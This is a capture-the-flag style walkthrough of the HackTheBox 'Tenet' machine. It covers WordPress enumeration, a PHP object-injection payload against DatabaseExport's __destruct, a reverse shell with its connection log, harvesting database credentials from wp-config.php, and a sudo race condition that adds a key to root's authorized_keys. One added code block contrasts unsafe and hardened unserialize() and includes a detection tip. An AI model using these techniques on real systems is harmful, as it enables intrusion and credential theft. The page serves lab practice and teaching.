Exploiting PHP deserialization 🔐
Intro to Insecure deserialization
Serialization is when an object in a programming language (say, a Java or PHP object) is converted into a format that can be stored or transferred. Deserialization is the opposite: the serialized object is read from a file or the network and converted back into an object.
Insecure deserialization vulnerabilities happen when applications deserialize objects without proper sanitization. An attacker can then manipulate serialized objects to change the program’s flow.
Today, let’s talk about PHP object injections. They are insecure deserialization vulnerabilities that happen when developers deserialize PHP objects recklessly.
Enumeration
nmap results
nmap -sC -sV -O nmap/tenet 10.129.158.233
gobuster results
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://tenet.htb
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://tenet.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/05/26 23:39:47 Starting gobuster in directory enumeration mode
===============================================================
/wp-content (Status: 301) [Size: 311] [--> http://tenet.htb/wp-content/]
/wp-includes (Status: 301) [Size: 312] [--> http://tenet.htb/wp-includes/]
/wp-admin (Status: 301) [Size: 309] [--> http://tenet.htb/wp-admin/]
WPScan results
wpscan -e u --url http://tenet.htb
Users Revealed in WPScan
neil
protagonist
WordPress application running on port 80
In one of the comments, the user neil talks about a sator PHP file and a backup.
Let’s append sator.php to the URL and check whether the file exists.
Let’s replace the domain name with the IP address.
Backup file found in the same directory
If you remember, neil was talking about a backup. Let’s find that backup file: most developers leave backup copies with a .bak extension.
Link: http://10.129.158.233/sator.php.bak
Sator.php.bak file
After analyzing the code, we see that the script reads a GET parameter named arepo and unserializes it. We might be able to exploit this with PHP object deserialization: the script defines a class called DatabaseExport with a __destruct function, and this function is what we can use to get RCE. The function uses file_put_contents to write the variable data to the file defined in the variable user_file.
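As an added illustration (not the box’s sator.php and not the author’s exploit script), this PHP stand-in reproduces the shape described above and contrasts the reckless unserialize() call with a hardened one; only DatabaseExport, user_file, data and arepo come from the write-up, everything else is assumed. Loading the constructed payload through safeLoad() produces no file write, while unsafeLoad() does.

```php
<?php
// Added example, not the box's sator.php: a stand-in class with the shape the
// write-up describes (a __destruct that calls file_put_contents), used to compare
// the reckless unserialize() call with a hardened one. Only DatabaseExport,
// user_file, data and arepo come from the page; the rest is assumed.
class DatabaseExport {
    public $user_file;
    public $data;

    public function __destruct() {
        // Runs whenever an instance is freed, including instances that
        // unserialize() built from user-controlled input.
        file_put_contents($this->user_file, $this->data);
    }
}

// Vulnerable pattern: the GET parameter is handed straight to unserialize(),
// so the caller picks the class and every property value.
function unsafeLoad(string $arepo) {
    return unserialize($arepo);
}

// Hardened pattern (PHP >= 7.0): allowed_classes => false turns every object
// in the input into __PHP_Incomplete_Class, so no application magic method
// (__destruct, __wakeup, ...) can fire. Prefer json_decode() for new code.
function safeLoad(string $arepo) {
    return unserialize($arepo, ['allowed_classes' => false]);
}

// Constructed test input in PHP's serialization format: an O: record naming the
// class and two string properties. The target is a scratch file, not a web root.
function buildTestPayload(string $target): string {
    $data = 'written by __destruct';
    return sprintf('O:14:"DatabaseExport":2:{s:9:"user_file";s:%d:"%s";s:4:"data";s:%d:"%s";}',
        strlen($target), $target, strlen($data), $data);
}

// Returns true if loading the payload with $loader caused a file write.
function causesWrite(callable $loader, string $payload, string $target): bool {
    @unlink($target);
    $loader($payload);          // returned value is dropped, so any object is freed here
    $written = file_exists($target);
    @unlink($target);
    return $written;
}

$target  = sys_get_temp_dir() . '/deser-demo-' . getmypid() . '.txt';
$payload = buildTestPayload($target);
var_dump(causesWrite('safeLoad',   $payload, $target));
var_dump(causesWrite('unsafeLoad', $payload, $target));
```

The serialized form is also what arrives in the arepo parameter, so a request log containing an O: record addressed to an application class is a practical detection signal for this class of attack.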
Exploitation
So, with the help of the article, we write the class DatabaseExport on our local machine, define user_file to be a PHP file and data to be a PHP reverse shell pointing back to our local machine.
Now let’s create a PHP script.
We got a shell
┌──(root💀kali)-[~/htb/tenet]
└─# ncl
listening on [any] 9001 ...
connect to [10.10.14.172] from (UNKNOWN) [10.129.158.233] 43438
ls
bhavsec.php
index.html
sator.php
sator.php.bak
users.txt
wordpress
Let’s go to the wordpress directory and view the contents of wp-config.php
cd wordpress
ls -la
total 228
drwxr-xr-x 5 www-data www-data 4096 May 27 15:08 .
drwxr-xr-x 3 www-data www-data 4096 May 27 15:22 ..
-rw-r--r-- 1 www-data www-data 405 Feb 6 2020 index.php
-rw-r--r-- 1 www-data www-data 19915 Feb 12 2020 license.txt
-rw-r--r-- 1 www-data www-data 7278 Jun 26 2020 readme.html
-rw-r--r-- 1 www-data www-data 7101 Jul 28 2020 wp-activate.php
drwxr-xr-x 9 www-data www-data 4096 Dec 8 22:13 wp-admin
-rw-r--r-- 1 www-data www-data 351 Feb 6 2020 wp-blog-header.php
-rw-r--r-- 1 www-data www-data 2328 Oct 8 2020 wp-comments-post.php
-rw-r--r-- 1 www-data www-data 2913 Feb 6 2020 wp-config-sample.php
-rw-r--r-- 1 www-data www-data 3185 Jan 7 10:04 wp-config.php
drwxr-xr-x 5 www-data www-data 4096 May 27 15:08 wp-content
-rw-r--r-- 1 www-data www-data 3939 Jul 30 2020 wp-cron.php
drwxr-xr-x 25 www-data www-data 12288 Dec 8 22:13 wp-includes
-rw-r--r-- 1 www-data www-data 2496 Feb 6 2020 wp-links-opml.php
-rw-r--r-- 1 www-data www-data 3300 Feb 6 2020 wp-load.php
-rw-r--r-- 1 www-data www-data 49831 Nov 9 2020 wp-login.php
-rw-r--r-- 1 www-data www-data 8509 Apr 14 2020 wp-mail.php
-rw-r--r-- 1 www-data www-data 20975 Nov 12 2020 wp-settings.php
-rw-r--r-- 1 www-data www-data 31337 Sep 30 2020 wp-signup.php
-rw-r--r-- 1 www-data www-data 4747 Oct 8 2020 wp-trackback.php
-rw-r--r-- 1 www-data www-data 3236 Jun 8 2020 xmlrpc.php
MySQL database credentials revealed
SSH login successful
neil@tenet:~$ whoami
neil
neil@tenet:~$ id
uid=1001(neil) gid=1001(neil) groups=1001(neil)
neil@tenet:~$
User Owned
Privilege Escalation
sudo -l results
It seems we can execute the /usr/local/bin/enableSSH.sh script as root.
neil@tenet:~$ sudo -l
Matching Defaults entries for neil on tenet:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:
User neil may run the following commands on tenet:
(ALL : ALL) NOPASSWD: /usr/local/bin/enableSSH.sh
neil@tenet:~$ ls -la /usr/local/bin/enableSSH.sh
-rwxr-xr-x 1 root root 1080 Dec 8 13:46 /usr/local/bin/enableSSH.sh
enableSSH.sh file
neil@tenet:~$ cat /usr/local/bin/enableSSH.sh
The addKey() function looks interesting.
addKey() {
tmpName=$(mktemp -u /tmp/ssh-XXXXXXXX)
(umask 110; touch $tmpName)
/bin/echo $key >>$tmpName
checkFile $tmpName
/bin/cat $tmpName >>/root/.ssh/authorized_keys
/bin/rm $tmpName
}
Let’s see what the script is doing.
This script writes the id_rsa.pub key stored in the variable key to a randomly named file of the form /tmp/ssh-XXXXXXXX, then appends the contents of that file to root’s authorized_keys, and then deletes the tmp file.
We have permission to write that file. Let’s replace root’s SSH_PUB_KEY with our own SSH public key.
So, if we can write our own SSH key to the tmp file before it gets copied to authorized_keys, our key will be appended to authorized_keys and we can SSH in as root.
Let’s write an infinite while loop in bash that continuously writes our SSH key to any file matching /tmp/ssh-XXXXXXXX using a wildcard. While this runs, we run the script with sudo a number of times.
Copy our SSH public key from the Kali machine.
Then run the while loop, then run the sudo command 3-4 times.
Root Owned
Thanks for reading this post, if you like my work you can support by buying me a coffee. ☕️